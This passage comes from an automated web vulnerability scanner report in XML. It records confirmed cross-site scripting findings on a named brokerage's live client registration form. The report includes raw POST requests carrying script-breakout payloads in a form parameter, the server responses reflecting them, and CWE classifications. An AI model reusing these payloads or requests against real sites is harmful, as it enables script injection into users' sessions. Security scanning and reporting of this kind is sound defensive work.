                                oElement.value = value;
                                bFound = false;
                                for (i=0; i&lt;oElement.options.length; i++)    {
                                    if(oElement.options[i].value == value)    {
                                        oElement.options[i].selected = true;
                                        bFound = true;
                                        break;
                                    }
                                }
                                if(value &amp;&amp; !bFound)    {
                                    oNew = document.createElement(&quot;OPTION&quot;);
                                    oNew.value = value;
                                    oNew.innerHTML = value;
                                    oElement.appendChild(oNew);
                                    oElement.lastChild.selected = true;
                                }
                            break;
                            default:
                                if(oElement.length)    {
                                    for(i=0;i&lt;oElement.length;i++)    {
                                        if(oElement[i].value == value)
                                            oElement[i].click();
                                        else
                                            oElement[i].checked = false;
                                    }
                                }
                                else {
                                    if(oElement.type == &quot;checkbox&quot;)
                                        oElement.click();
                                    else {
		                            	document.getElementById(&apos;hidHtmlConvert&apos;).innerHTML = value; 
		                            	oElement.value = document.getElementById(&apos;hidHtmlConvert&apos;).innerHTML; 
                                    //  oElement.value = value;
                                        }
                                }
                            break;
                        }
                        try    {
                            oElement.fireEvent(&quot;onchange&quot;);
                        }
                        catch(e) {
                            try {
                                var evt = document.createEvent(&quot;HTMLEvents&quot;);
                                evt.initEvent(&quot;change&quot;,true,true);
                                oElement.dispatchEvent( evt );
                            }
                            catch(e){}
                        }
                    }
                    catch(e){}
                }
                function fFillForm()    {
fFillFormField(document.mainForm[&quot;aData[STRAT_REF]&quot;], &quot;-1&quot;);
fFillFormField(document.mainForm[&quot;aData[FEEDBACK_URL]&quot;], &quot;-1&quot;);
fFillFormField(document.mainForm[&quot;aData[TYPE]&quot;], &quot;\&apos;\&quot;--&gt;&lt;/style&gt;&lt;/script&gt;&lt;script&gt;netsparker(0x000152)&lt;/script&gt;&quot;);
fFillFormField(document.mainForm[&quot;aData[accountKind]&quot;], &quot;3&quot;);}&lt;/script&gt;&lt;/form&gt;
&lt;/table&gt;
&lt;img id=&quot;progress_img&quot; src=&quot;../../images/progress_bar.gif&quot; width=&quot;69&quot; height=&quot;17&quot; border=&quot;0&quot; style=&quot;display:none;&quot;&gt;
  &lt;/body&gt;
&lt;/html&gt;
 ]]></rawresponse>

		<extrainformation>
		</extrainformation>


        <classification>
            <OWASP>A2</OWASP>
            <WASC>08</WASC>
            <CWE>79</CWE>
            <CAPEC>19</CAPEC>
        </classification>
				
	</vulnerability>

	<vulnerability confirmed="True">
		<url>https://live-login.dukascopy.com/fo/register/live/index.php</url>
		<type>XSS</type>
		<severity>Important</severity>
		
		<vulnerableparametertype>Post</vulnerableparametertype>
		<vulnerableparameter>aData%5BTYPE%5D</vulnerableparameter>
		<vulnerableparametervalue>&apos;&quot;--&gt;&lt;/style&gt;&lt;/script&gt;&lt;script&gt;netsparker(0x000154)&lt;/script&gt;</vulnerableparametervalue>

		<rawrequest><![CDATA[POST /fo/register/live/index.php HTTP/1.1
Referer: https://live-login.dukascopy.com/fo/register/live/index.php
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: live-login.dukascopy.com
Content-Length: 335
Accept-Encoding: gzip, deflate

aData%5BSTRAT_REF%5D=-1&amp;aData%5BFEEDBACK_URL%5D=-1&amp;aData%5BTYPE%5D=&apos;%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x000154)%3c%2fscript%3e&amp;aData%5BaccountKind%5D=200&amp;aData%5BserviceProvider%5D=BBAC47&amp;aData%5BservProviderAnswer%5D=Yes&amp;aData%5BHTTP_REFERER%5D=3&amp;backFormMarker=3&amp;currentFormMarker=step1&amp;nextFormMarker=step2
 ]]></rawrequest>
		<rawresponse><![CDATA[HTTP/1.1 200 OK
Date: Thu, 17 Mar 2011 19:25:39 GMT
Server: Apache/2
X-Powered-By: PHP/5.3.3
Transfer-Encoding: chunked
Content-Type: text/html; charset=windows-1252



&lt;html lang=&quot;en&quot;&gt;
  &lt;head&gt;
    &lt;title&gt;Client Registration&lt;/title&gt;
    &lt;META http-equiv=Content-Type content=&quot;text/html; charset=windows-1252&quot;&gt;
    &lt;script&gt;
      function init()  {
        fFillForm();
      }

      var bShowWaiting = true;

      function showWaiting()  {
        if(bShowWaiting)  {
          for (odj in document.body.childNodes)
            try  {
	            document.body.childNodes[odj].style.display = &apos;none&apos;;
	          }catch(e){}

	        oProgressDiv = document.createElement(&apos;div&apos;);
	        document.body.appendChild(oProgressDiv);
	        oProgressDiv.align = &apos;center&apos;;
	        oProgressDiv.innerHTML = &quot;&lt;br/&gt;&lt;br/&gt;&lt;br/&gt;&lt;br/&gt;&lt;br/&gt;&lt;br/&gt;&lt;br/&gt;Please, wait&lt;br/&gt;&quot;;

	        tmp = document.getElementById(&apos;progress_img&apos;)
	        oProgressImg = tmp.cloneNode(false);
	        oProgressImg.style.display = &apos;block&apos;;
	        oProgressDiv.appendChild(oProgressImg);
	        bShowWaiting = false;
	      }
      }

    function addEventHandler(obj, type, func, useCapture) {
        if (obj.addEventListener) {
            obj.addEventListener(type, func, useCapture);
            return true;
        }
        else if (obj.attachEvent) {
            var r = obj.attachEvent(&apos;on&apos; + type, func);
            return r;
    	}
        else {
            obj[&apos;on&apos; + type] = func;
        }
    }

    tipIndex = 0;
    function drawTip (sTip, width) {
        this.hideDelay = 600;
        this.sTip = sTip;
        this.hideTimeoutId = null;
        var oThis = this;

        this.show = function (event) {
            var oEvent = (event || window.event);
            if (oThis.hideTimeoutId) {
                window.clearTimeout(oThis.hideTimeoutId);
                return;
            } else if (oThis.oTipContainer.style.display == &quot;block&quot;) {
                return;
            }
            aSelects = document.getElementsByTagName(&apos;SELECT&apos;);
            for (i=0; i &lt; aSelects.length; i++)  {
                aSelects[i].style.visibility = &apos;hidden&apos;;
            }
            oThis.oTipContainer.style.top = oEvent.clientY - oThis.oTipContainer.offsetHeight - 2;
            oThis.oTipContainer.style.left = oEvent.clientX + 3;
            oThis.oTipContainer.style.display = &quot;block&quot;;
        }

        this.hide = function () {
            oThis.hideTimeoutId = null;
            oThis.oTipContainer.style.display = &quot;none&quot;;
            aSelects = document.getElementsByTagName(&apos;SELECT&apos;);
            for (i=0; i &lt; aSelects.length; i++)  {
                aSelects[i].style.visibility = &apos;&apos;;
            }
        }

        this.hideTimeouted = function () {
            oThis.hideTimeoutId = window.setTimeout(oThis.hide, oThis.hideDelay);
        }

        document.write(&apos;&lt;img src=&quot;../../images/icons/16x16/tip.png&quot; align=&quot;absmiddle&quot; height=&quot;16&quot; width=&quot;16&quot; border=&quot;0&quot; id=&quot;tipImg&apos; + tipIndex + &apos;&quot;/&gt;&apos;);
        document.write(&apos;&lt;div class=&quot;tip&quot; style=&quot;display:none;&quot; id=&quot;tipContainer&apos; + tipIndex + &apos;&quot;&gt;&apos; + sTip + &apos;&lt;/div&gt;&apos;);

        this.oTipImg = document.getElementById(&apos;tipImg&apos; + tipIndex);
        this.oTipContainer = document.getElementById(&apos;tipContainer&apos; + tipIndex);
        if (typeof(width) != &apos;undefined&apos;)
            this.oTipContainer.style.width = width;
        addEventHandler(this.oTipImg, &apos;mouseover&apos;, this.show);
        addEventHandler(this.oTipContainer, &apos;mouseover&apos;, this.show);
        addEventHandler(this.oTipImg, &apos;mouseout&apos;, this.hideTimeouted);
        addEventHandler(this.oTipContainer, &apos;mouseout&apos;, this.hideTimeouted);
        tipIndex++;
    }
    &lt;/script&gt;
    &lt;!--&lt;script src=&quot;js/lib.js&quot;&gt;&lt;/script&gt;
    &lt;script src=&quot;js/checkForm.js&quot;&gt;&lt;/script&gt;--&gt;
  &lt;style&gt;
  body, td, span, div, p, tr, th, option, font, button, input, select, textarea, b, i, a {
    font-size:8pt;
    font-family:Verdana;
  }
  table  {
   table-layout:fixed;
  }
  a  {
    font-weight:bold;
    text-decoration:underline;
    color:black;
  }

  a:hover  {
    color:#666666;
  }

  .header  {
    font-size:11pt;
    height:24px;
    color:#FFFFFF;
    font-weight:bold;
    text-align:center;
    background-image: url(&apos;https://www.dukascopy.com/swiss/inc/images/headline_bg_menu.gif&apos;);
    background-color:#000;
    background-position:0px 0px;
    background-repeat:repeat-x;
  }

  .header a  {
    color:#FFFFFF;
    font-weight:bold;
    text-decoration:none;
  }

  .header a:hover  {
    color:#FFFFFF;
    text-decoration:underline;
  }

  .subheader  {
    font-size:10pt;
    color:#333333;
    font-weight:bold;
    text-align:center;
    padding:5 0 0 0;
  }

 .subheader *  {
    font-size:10pt;
    font-weight:bold;
  }

  .step  {
    font-size:10pt;
    color:#999999;
    font-weight:bold;
    text-align:center;
    padding:5 0 5 0;
  }
  .error  {
    font-size:10pt;
    color:#EE0000;
    text-align:center;
    padding:5 0 5 0;
    font-weight:bold;
  }
  .title  {
    text-align:right;
    width:50%;
    padding:2 2 2 2;
    color:#1D4470;
  }
  .field  {
    text-align:left;
    width:50%;
    padding:2 22 2 2;
  }
  .buttons  {
    text-align:center;
    padding:4 4 4 4;
  }
  .button  {
    color:white;
    border:1px outset;
    cursor:pointer;
    background-color:#1D4470;
    width:100px;
    font-weight:bold;
    height:13pt;
  }
  .info  {
    text-align:center;
    padding-left:22;
    padding-right:22;
  }
  input.text  {
    width:100%;
    border-top:1px solid #cccccc;
    border-right:1px solid #cccccc;
    border-bottom:1px solid #cccccc;
    border-left:1px solid #cccccc;
  }
  input.checkbox {

  }
  textarea  {
    width:100%;
    border:1px solid #cccccc;
    font-size:8pt !important;
    font-weight:normal !important;
  }
  select {
    border:1px solid #cccccc;
  }

  .tip {
    position:absolute;
    border: 1px solid #333333;
    background-color: #FFFFE1;
    width: 250px;
    padding: 7px;
    text-align: justify;
    z-index:100;
  }

  &lt;/style&gt;
  &lt;/head&gt;
  &lt;body onLoad=&quot;init();&quot; onBeforeUnload=&quot;showWaiting();&quot; style=&quot;margin:0px;padding:0px;&quot;&gt;
  &lt;div style=&quot;background:url(&apos;https://www.dukascopy.com/pics/topBackground.png&apos;) repeat-x;&quot;&gt;&lt;img src=&quot;https://www.dukascopy.com/pics/headers/website_logo_bank.jpg&quot; alt=&quot;Dukascopy&quot; style=&quot;width:579px;height:103px;border:none;&quot;&gt;&lt;/div&gt;
  &lt;table width=&quot;100%&quot; align=&quot;center&quot; border=&quot;0&quot; cellpadding=&quot;0&quot; cellspacing=&quot;0&quot;&gt;
&lt;form style=&quot;margin:0px;padding:0px;&quot; name=&quot;mainForm&quot; action=&quot;/fo/register/live/index.php&quot; method=&quot;post&quot;&gt;
  &lt;tr&gt;
    &lt;td colspan=&quot;2&quot; class=&quot;header&quot;&gt;
      Client Registration
    &lt;/td&gt;
  &lt;/tr&gt;
  &lt;tr&gt;
    &lt;td colspan=&quot;2&quot; class=&quot;step&quot;&gt;
      Step 1 of 6-12
    &lt;/td&gt;
  &lt;/tr&gt;
  &lt;tr&gt;
    &lt;td colspan=&quot;2&quot;&gt;
      &lt;div class=&quot;error&quot; id=topError&gt;
      	      &lt;div&gt;
    &lt;/td&gt;
  &lt;/tr&gt;
  &lt;tr&gt;
    &lt;td class=&quot;title&quot; valign=&quot;top&quot;&gt;
      Date:
    &lt;/td&gt;
    &lt;td class=&quot;field&quot; valign=&quot;top&quot;&gt;
      Thu, 17 Mar 2011    &lt;/td&gt;
  &lt;/tr&gt;
  &lt;tr&gt;
    &lt;td class=&quot;title&quot; valign=&quot;top&quot;&gt;
      Status:
    &lt;/td&gt;
    &lt;script&gt;
    	function radioClickControll() {
    		var retAcc = document.getElementById(&apos;radio_accountKind_6&apos;);
    		var stAcc  = document.getElementById(&apos;radio_accountKind_7&apos;);
    		var rInd   = document.getElementById(&apos;radio_type_1&apos;);
    		var rJoint = document.getElementById(&apos;radio_type_3&apos;);
    		var rLegal = document.getElementById(&apos;radio_type_2&apos;);

    		if(retAcc.checked) {
    			rLegal.disabled = true;
    		}
    		if(stAcc.checked) {
    			rLegal.disabled = false;
    		}

    		if(rLegal.checked) {
    			retAcc.disabled = true;
    		} 
    		if(rInd.checked || rJoint.checked) { 
    			retAcc.disabled = false;
    		}

    		
    	}
    &lt;/script&gt;
    &lt;td class=&quot;field&quot; valign=&quot;top&quot;&gt;
      &lt;input type=&quot;hidden&quot; name=&quot;aData[STRAT_REF]&quot; value=&quot;-1&quot;&gt;
      &lt;input type=&quot;hidden&quot; name=&quot;aData[FEEDBACK_URL]&quot; value=&quot;-1&quot;&gt;
      &lt;input type=&quot;radio&quot; name=&quot;aData[TYPE]&quot; id=&quot;radio_type_1&quot; value=&quot;1&quot; checked onclick=&quot;radioClickControll()&quot;&gt; &lt;label for=&quot;radio_type_1&quot;&gt;For Individuals&lt;/label&gt;&lt;br/&gt;
      &lt;input type=&quot;radio&quot; name=&quot;aData[TYPE]&quot; id=&quot;radio_type_3&quot; value=&quot;3&quot; onclick=&quot;radioClickControll()&quot;&gt; &lt;label for=&quot;radio_type_3&quot;&gt;For Joint Account&lt;/label&gt;&lt;br/&gt;
      &lt;input type=&quot;radio&quot; name=&quot;aData[TYPE]&quot; id=&quot;radio_type_2&quot; value=&quot;2&quot; onclick=&quot;radioClickControll()&quot;&gt; &lt;label for=&quot;radio_type_2&quot;&gt;For Legal Entities&lt;/label&gt;
    &lt;/td&gt;
  &lt;/tr&gt;
  &lt;tr&gt;
    &lt;td class=&quot;title&quot; valign=&quot;top&quot;&gt;
      Kind of account:
    &lt;/td&gt;
    &lt;td class=&quot;field&quot; valign=&quot;top&quot;&gt;
      &lt;script&gt;
        function fSetManagedAccountStrategyMode(bShown)  {
          oInp = document.getElementById(&apos;sel_managedAccountStrategy&apos;);
          oInp.disabled = !bShown;
          oInp.style.display = (bShown?&quot;&quot;:&quot;none&quot;);
          if(bShown) {
          	document.getElementById(&apos;servProvider0&apos;).checked = false;
          }
        }
        
        function fSetServProviderMode(bShown)  {
          oInp = document.getElementById(&apos;sel_servProvider&apos;);
          oInp.disabled = !bShown;
          oInp.style.display = (bShown?&quot;&quot;:&quot;none&quot;);
          if(bShown) {
          	document.getElementById(&apos;extManContact0&apos;).checked = false;
          } 
        }
      &lt;/script&gt;
      &lt;table border=&quot;0&quot; cellpadding=&quot;1&quot; cellspacing=&quot;0&quot; style=&quot;table-layout:auto;&quot;&gt;
        &lt;tr&gt;
          &lt;td&gt;
            &lt;input type=&quot;radio&quot; name=&quot;aData[accountKind]&quot; value=&quot;&quot; style=display:none checked&gt;
            &lt;input type=&quot;radio&quot; name=&quot;aData[accountKind]&quot; value=&quot;6&quot; id=&quot;radio_accountKind_6&quot;  onClick=&quot;radioClickControll();fSetServProviderMode(false);fSetManagedAccountStrategyMode(false);&quot;&gt;
          &lt;/td&gt;
          &lt;td&gt;
            &lt;label for=&quot;radio_accountKind_6&quot;&gt;Retail Account&lt;/label&gt;
          &lt;/td&gt;
        &lt;/tr&gt;
        
        &lt;tr&gt;
          &lt;td&gt;
            &lt;input type=&quot;radio&quot; name=&quot;aData[accountKind]&quot; value=&quot;7&quot; id=&quot;radio_accountKind_7&quot;   onClick=&quot;radioClickControll();fSetServProviderMode(false);fSetManagedAccountStrategyMode(false);&quot;&gt;
          &lt;/td&gt;
          &lt;td&gt;
            &lt;label for=&quot;radio_accountKind_7&quot;&gt;Standard Account (from 50 000 USD)&lt;/label&gt;
          &lt;/td&gt;
        &lt;/tr&gt;
        
        &lt;tr&gt;
          &lt;td&gt;
            &lt;input type=&quot;radio&quot; name=&quot;aData[accountKind]&quot; value=&quot;100&quot; id=&quot;radio_accountKind_100&quot;  onClick=&quot;fSetServProviderMode(false);fSetManagedAccountStrategyMode(true);&quot;&gt;
          &lt;/td&gt;
          &lt;td&gt;
            &lt;label for=&quot;radio_accountKind_100&quot;&gt;Managed Account&lt;/label&gt;
          &lt;/td&gt;
        &lt;/tr&gt;
        &lt;tr&gt;
        &lt;td&gt;&lt;/td&gt;
          &lt;td valign=&quot;top&quot; id=&quot;sel_managedAccountStrategy&quot; style=&quot;display:none;&quot; disabled&gt;
			          
            &lt;b&gt;Whilst selecting your Manager/Attorney and for convenience purposes only you may use the pull-down menu. Dukascopy has not performed any competence verification or due diligence, does not issue any recommendation concerning your Manager/Attorney and can not be held liable for any losses, direct and indirect damages whether financial or not, resulting from your Manager/Attorney&amp;#039;s acts or omissions.&lt;/b&gt;&lt;br&gt;
            &lt;select name=&quot;aData[managedAccountStrategy]&quot; id=&quot;sel_mas&quot;&gt;
		      &lt;option value=&apos;1ABEM3&apos; &gt;&amp;nbsp;1ABEM3&lt;/option&gt;
&lt;option value=&apos;356JFH1&apos; &gt;&amp;nbsp;356JFH1&lt;/option&gt;
&lt;option value=&apos;356JFH2&apos; &gt;&amp;nbsp;356JFH2&lt;/option&gt;
&lt;option value=&apos;356JFH3&apos; &gt;&amp;nbsp;356JFH3&lt;/option&gt;
&lt;option value=&apos;356JFH4&apos; &gt;&amp;nbsp;356JFH4&lt;/option&gt;
&lt;option value=&apos;356JFH5&apos; &gt;&amp;nbsp;356JFH5&lt;/option&gt;
&lt;option value=&apos;3SFX1&apos; &gt;&amp;nbsp;3SFX1&lt;/option&gt;
&lt;option value=&apos;3SFX2&apos; &gt;&amp;nbsp;3SFX2&lt;/option&gt;
&lt;option value=&apos;45GHKLBV&apos; &gt;&amp;nbsp;45GHKLBV&lt;/option&gt;
&lt;option value=&apos;AADB88&apos; &gt;&amp;nbsp;AADB88&lt;/option&gt;
&lt;option value=&apos;ABBB22&apos; &gt;&amp;nbsp;ABBB22&lt;/option&gt;
&lt;option value=&apos;ABEF73&apos; &gt;&amp;nbsp;ABEF73&lt;/option&gt;
&lt;option value=&apos;AEAC86&apos; &gt;&amp;nbsp;AEAC86&lt;/option&gt;
&lt;option value=&apos;AECC31&apos; &gt;&amp;nbsp;AECC31&lt;/option&gt;
&lt;option value=&apos;ALPX&apos; &gt;&amp;nbsp;ALPX&lt;/option&gt;
&lt;option value=&apos;ALTV&apos; &gt;&amp;nbsp;ALTV&lt;/option&gt;
&lt;option value=&apos;ARCH&apos; &gt;&amp;nbsp;ARCH&lt;/option&gt;
&lt;option value=&apos;ARXX&apos; &gt;&amp;nbsp;ARXX&lt;/option&gt;
&lt;option value=&apos;AZAT681&apos; &gt;&amp;nbsp;AZAT681&lt;/option&gt;
&lt;option value=&apos;Augustan&apos; &gt;&amp;nbsp;Augustan&lt;/option&gt;
&lt;option value=&apos;BABC92&apos; &gt;&amp;nbsp;BABC92&lt;/option&gt;
&lt;option value=&apos;BADF84&apos; &gt;&amp;nbsp;BADF84&lt;/option&gt;
&lt;option value=&apos;BAYWM&apos; &gt;&amp;nbsp;BAYWM&lt;/option&gt;
&lt;option value=&apos;BCAD67&apos; &gt;&amp;nbsp;BCAD67&lt;/option&gt;
&lt;option value=&apos;BCBC72&apos; &gt;&amp;nbsp;BCBC72&lt;/option&gt;
&lt;option value=&apos;BCCA82&apos; &gt;&amp;nbsp;BCCA82&lt;/option&gt;
&lt;option value=&apos;BCEE55&apos; &gt;&amp;nbsp;BCEE55&lt;/option&gt;
&lt;option value=&apos;BDAD35&apos; &gt;&amp;nbsp;BDAD35&lt;/option&gt;
&lt;option value=&apos;BDCC70&apos; &gt;&amp;nbsp;BDCC70&lt;/option&gt;
&lt;option value=&apos;BDCP&apos; &gt;&amp;nbsp;BDCP&lt;/option&gt;
&lt;option value=&apos;BEAD70&apos; &gt;&amp;nbsp;BEAD70&lt;/option&gt;
&lt;option value=&apos;BEAF55&apos; &gt;&amp;nbsp;BEAF55&lt;/option&gt;
&lt;option value=&apos;BECF19&apos; &gt;&amp;nbsp;BECF19&lt;/option&gt;
&lt;option value=&apos;BEDD59&apos; &gt;&amp;nbsp;BEDD59&lt;/option&gt;
&lt;option value=&apos;BEEE43&apos; &gt;&amp;nbsp;BEEE43&lt;/option&gt;
&lt;option value=&apos;BRKIC&apos; &gt;&amp;nbsp;BRKIC&lt;/option&gt;
&lt;option value=&apos;BUSH&apos; &gt;&amp;nbsp;BUSH&lt;/option&gt;
&lt;option value=&apos;BUSH288&apos; &gt;&amp;nbsp;BUSH288&lt;/option&gt;
&lt;option value=&apos;CBFB47&apos; &gt;&amp;nbsp;CBFB47&lt;/option&gt;
&lt;option value=&apos;CCDE32&apos; &gt;&amp;nbsp;CCDE32&lt;/option&gt;
&lt;option value=&apos;CCPFX&apos; &gt;&amp;nbsp;CCPFX&lt;/option&gt;
&lt;option value=&apos;CDCD88&apos; &gt;&amp;nbsp;CDCD88&lt;/option&gt;
&lt;option value=&apos;CDFD34&apos; &gt;&amp;nbsp;CDFD34&lt;/option&gt;
&lt;option value=&apos;CEDD62&apos; &gt;&amp;nbsp;CEDD62&lt;/option&gt;
&lt;option value=&apos;CEFA67&apos; &gt;&amp;nbsp;CEFA67&lt;/option&gt;
&lt;option value=&apos;CEFF58&apos; &gt;&amp;nbsp;CEFF58&lt;/option&gt;
&lt;option value=&apos;CFEC46&apos; &gt;&amp;nbsp;CFEC46&lt;/option&gt;
&lt;option value=&apos;CFFX&apos; &gt;&amp;nbsp;CFFX&lt;/option&gt;
&lt;option value=&apos;CGFX&apos; &gt;&amp;nbsp;CGFX&lt;/option&gt;
&lt;option value=&apos;CHBC&apos; &gt;&amp;nbsp;CHBC&lt;/option&gt;
&lt;option value=&apos;CLMFX&apos; &gt;&amp;nbsp;CLMFX&lt;/option&gt;
&lt;option value=&apos;CurrClub&apos; &gt;&amp;nbsp;CurrClub&lt;/option&gt;
&lt;option value=&apos;DADD65&apos; &gt;&amp;nbsp;DADD65&lt;/option&gt;
&lt;option value=&apos;DBAA26&apos; &gt;&amp;nbsp;DBAA26&lt;/option&gt;
&lt;option value=&apos;DBAF77&apos; &gt;&amp;nbsp;DBAF77&lt;/option&gt;
&lt;option value=&apos;DBFB93&apos; &gt;&amp;nbsp;DBFB93&lt;/option&gt;
&lt;option value=&apos;DCCD84&apos; &gt;&amp;nbsp;DCCD84&lt;/option&gt;
&lt;option value=&apos;DCEC93&apos; &gt;&amp;nbsp;DCEC93&lt;/option&gt;
&lt;option value=&apos;DDBF26&apos; &gt;&amp;nbsp;DDBF26&lt;/option&gt;
&lt;option value=&apos;DDCC49&apos; &gt;&amp;nbsp;DDCC49&lt;/option&gt;
&lt;option value=&apos;DDDB32&apos; &gt;&amp;nbsp;DDDB32&lt;/option&gt;
&lt;option value=&apos;DEFD33&apos; &gt;&amp;nbsp;DEFD33&lt;/option&gt;
&lt;option value=&apos;DF56NB&apos; &gt;&amp;nbsp;DF56NB&lt;/option&gt;
&lt;option value=&apos;DF794J0&apos; &gt;&amp;nbsp;DF794J0&lt;/option&gt;
&lt;option value=&apos;DFAF50&apos; &gt;&amp;nbsp;DFAF50&lt;/option&gt;
&lt;option value=&apos;DG785&apos; &gt;&amp;nbsp;DG785&lt;/option&gt;
&lt;option value=&apos;DOXX&apos; &gt;&amp;nbsp;DOXX&lt;/option&gt;
&lt;option value=&apos;DRFX1&apos; &gt;&amp;nbsp;DRFX1&lt;/option&gt;
&lt;option value=&apos;DSBP&apos; &gt;&amp;nbsp;DSBP&lt;/option&gt;
&lt;option value=&apos;EACE93&apos; &gt;&amp;nbsp;EACE93&lt;/option&gt;
&lt;option value=&apos;EADA74&apos; &gt;&amp;nbsp;EADA74&lt;/option&gt;
&lt;option value=&apos;EAEE21&apos; &gt;&amp;nbsp;EAEE21&lt;/option&gt;
&lt;option value=&apos;EAFD36&apos; &gt;&amp;nbsp;EAFD36&lt;/option&gt;
&lt;option value=&apos;EBAD44&apos; &gt;&amp;nbsp;EBAD44&lt;/option&gt;
&lt;option value=&apos;EBBB34&apos; &gt;&amp;nbsp;EBBB34&lt;/option&gt;
&lt;option value=&apos;EBDE90&apos; &gt;&amp;nbsp;EBDE90&lt;/option&gt;
&lt;option value=&apos;ECURRENTZ&apos; &gt;&amp;nbsp;ECURRENTZ&lt;/option&gt;
&lt;option value=&apos;EDCC46&apos; &gt;&amp;nbsp;EDCC46&lt;/option&gt;
&lt;option value=&apos;EFAF70&apos; &gt;&amp;nbsp;EFAF70&lt;/option&gt;
&lt;option value=&apos;EFBB17&apos; &gt;&amp;nbsp;EFBB17&lt;/option&gt;
&lt;option value=&apos;EFCA50&apos; &gt;&amp;nbsp;EFCA50&lt;/option&gt;
&lt;option value=&apos;EFCA92&apos; &gt;&amp;nbsp;EFCA92&lt;/option&gt;
&lt;option value=&apos;FAAC62&apos; &gt;&amp;nbsp;FAAC62&lt;/option&gt;
&lt;option value=&apos;FBDB80&apos; &gt;&amp;nbsp;FBDB80&lt;/option&gt;
&lt;option value=&apos;FBDF30&apos; &gt;&amp;nbsp;FBDF30&lt;/option&gt;
&lt;option value=&apos;FBED79&apos; &gt;&amp;nbsp;FBED79&lt;/option&gt;
&lt;option value=&apos;FBFA65&apos; &gt;&amp;nbsp;FBFA65&lt;/option&gt;
&lt;option value=&apos;FCCA80&apos; &gt;&amp;nbsp;FCCA80&lt;/option&gt;
&lt;option value=&apos;FDAG&apos; &gt;&amp;nbsp;FDAG&lt;/option&gt;
&lt;option value=&apos;FEEC47&apos; &gt;&amp;nbsp;FEEC47&lt;/option&gt;
&lt;option value=&apos;FFFF98&apos; &gt;&amp;nbsp;FFFF98&lt;/option&gt;
&lt;option value=&apos;FGB1WFM&apos; &gt;&amp;nbsp;FGB1WFM&lt;/option&gt;
&lt;option value=&apos;FGH7GB&apos; &gt;&amp;nbsp;FGH7GB&lt;/option&gt;
&lt;option value=&apos;FGH90IK&apos; &gt;&amp;nbsp;FGH90IK&lt;/option&gt;
&lt;option value=&apos;FIBX1&apos; &gt;&amp;nbsp;FIBX1&lt;/option&gt;
&lt;option value=&apos;FORMA&apos; &gt;&amp;nbsp;FORMA&lt;/option&gt;
&lt;option value=&apos;FORT&apos; &gt;&amp;nbsp;FORT&lt;/option&gt;
&lt;option value=&apos;FRAPX&apos; &gt;&amp;nbsp;FRAPX&lt;/option&gt;
&lt;option value=&apos;FTAM&apos; &gt;&amp;nbsp;FTAM&lt;/option&gt;
&lt;option value=&apos;FXDASH1A&apos; &gt;&amp;nbsp;FXDASH1A&lt;/option&gt;
&lt;option value=&apos;FXG1&apos; &gt;&amp;nbsp;FXG1&lt;/option&gt;
&lt;option value=&apos;FXMN&apos; &gt;&amp;nbsp;FXMN&lt;/option&gt;
&lt;option value=&apos;FXPOR&apos; &gt;&amp;nbsp;FXPOR&lt;/option&gt;
&lt;option value=&apos;FXRGC&apos; &gt;&amp;nbsp;FXRGC&lt;/option&gt;
&lt;option value=&apos;G7NV&apos; &gt;&amp;nbsp;G7NV&lt;/option&gt;
&lt;option value=&apos;GHJKL76&apos; &gt;&amp;nbsp;GHJKL76&lt;/option&gt;
&lt;option value=&apos;GLCM&apos; &gt;&amp;nbsp;GLCM&lt;/option&gt;
&lt;option value=&apos;GSYE&apos; &gt;&amp;nbsp;GSYE&lt;/option&gt;
&lt;option value=&apos;GTG67H&apos; &gt;&amp;nbsp;GTG67H&lt;/option&gt;
&lt;option value=&apos;GTXX&apos; &gt;&amp;nbsp;GTXX&lt;/option&gt;
&lt;option value=&apos;HJH768&apos; &gt;&amp;nbsp;HJH768&lt;/option&gt;
&lt;option value=&apos;HKJBXF&apos; &gt;&amp;nbsp;HKJBXF&lt;/option&gt;
&lt;option value=&apos;HRAPX&apos; &gt;&amp;nbsp;HRAPX&lt;/option&gt;
&lt;option value=&apos;HUSK&apos; &gt;&amp;nbsp;HUSK&lt;/option&gt;
&lt;option value=&apos;IDTX&apos; &gt;&amp;nbsp;IDTX&lt;/option&gt;
&lt;option value=&apos;IDTX1&apos; &gt;&amp;nbsp;IDTX1&lt;/option&gt;
&lt;option value=&apos;IDTX2&apos; &gt;&amp;nbsp;IDTX2&lt;/option&gt;
&lt;option value=&apos;IDTX3&apos; &gt;&amp;nbsp;IDTX3&lt;/option&gt;
&lt;option value=&apos;INHH&apos; &gt;&amp;nbsp;INHH&lt;/option&gt;
&lt;option value=&apos;ITASCA&apos; &gt;&amp;nbsp;ITASCA&lt;/option&gt;
&lt;option value=&apos;JDCFX&apos; &gt;&amp;nbsp;JDCFX&lt;/option&gt;
&lt;option value=&apos;JLS&apos; &gt;&amp;nbsp;JLS&lt;/option&gt;
&lt;option value=&apos;JSDM&apos; &gt;&amp;nbsp;JSDM&lt;/option&gt;
&lt;option value=&apos;KRCM1&apos; &gt;&amp;nbsp;KRCM1&lt;/option&gt;
&lt;option value=&apos;KRCM2&apos; &gt;&amp;nbsp;KRCM2&lt;/option&gt;
&lt;option value=&apos;LBMFX&apos; &gt;&amp;nbsp;LBMFX&lt;/option&gt;
&lt;option value=&apos;LBXX2&apos; &gt;&amp;nbsp;LBXX2&lt;/option&gt;
&lt;option value=&apos;LMXX&apos; &gt;&amp;nbsp;LMXX&lt;/option&gt;
&lt;option value=&apos;LivIn&apos; &gt;&amp;nbsp;LivIn&lt;/option&gt;
&lt;option value=&apos;MASI&apos; &gt;&amp;nbsp;MASI&lt;/option&gt;
&lt;option value=&apos;MBCM&apos; &gt;&amp;nbsp;MBCM&lt;/option&gt;
&lt;option value=&apos;MBCO&apos; &gt;&amp;nbsp;MBCO&lt;/option&gt;
&lt;option value=&apos;MDLV&apos; &gt;&amp;nbsp;MDLV&lt;/option&gt;
&lt;option value=&apos;MEIDAO&apos; &gt;&amp;nbsp;MEIDAO&lt;/option&gt;
&lt;option value=&apos;NK71&apos; &gt;&amp;nbsp;NK71&lt;/option&gt;
&lt;option value=&apos;NKHFX&apos; &gt;&amp;nbsp;NKHFX&lt;/option&gt;
&lt;option value=&apos;OANFx5&apos; &gt;&amp;nbsp;OANFx5&lt;/option&gt;
&lt;option value=&apos;OANFx55&apos; &gt;&amp;nbsp;OANFx55&lt;/option&gt;
&lt;option value=&apos;OGFX&apos; &gt;&amp;nbsp;OGFX&lt;/option&gt;
